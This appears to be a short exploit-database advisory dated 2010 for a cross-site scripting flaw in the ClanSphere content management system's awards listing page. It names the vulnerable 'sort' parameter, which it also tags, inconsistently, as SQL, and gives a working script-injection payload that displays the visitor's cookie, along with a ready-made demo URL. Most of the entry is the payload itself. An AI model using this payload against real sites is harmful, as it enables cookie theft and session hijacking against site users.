id: 12251
date: 05/15/2010
title: ClanSphere XSS Vulnerability
author: n/a
cves: 

============================
ClanSphere XSS Vulnerability
============================

Script    : csphere http://www.csphere.eu/
   
Download  : http://www.csphere.eu/index/files
       
############################################################################   
         
[ Vulnerable File ] 
     
index.php?mod=awards&action=list&start=0&sort=3 [ SQL ] 
          
     
[ XpL ] 
       
"><script>alert(document.cookie)</script>
   
[ Demo] 
   
http://server/index.php?mod=awards&action=list&start=0&sort=3"><script>alert(document.cookie)</script>
 
 
###########################################################################################################



#  0day.today [2023-03-27]  #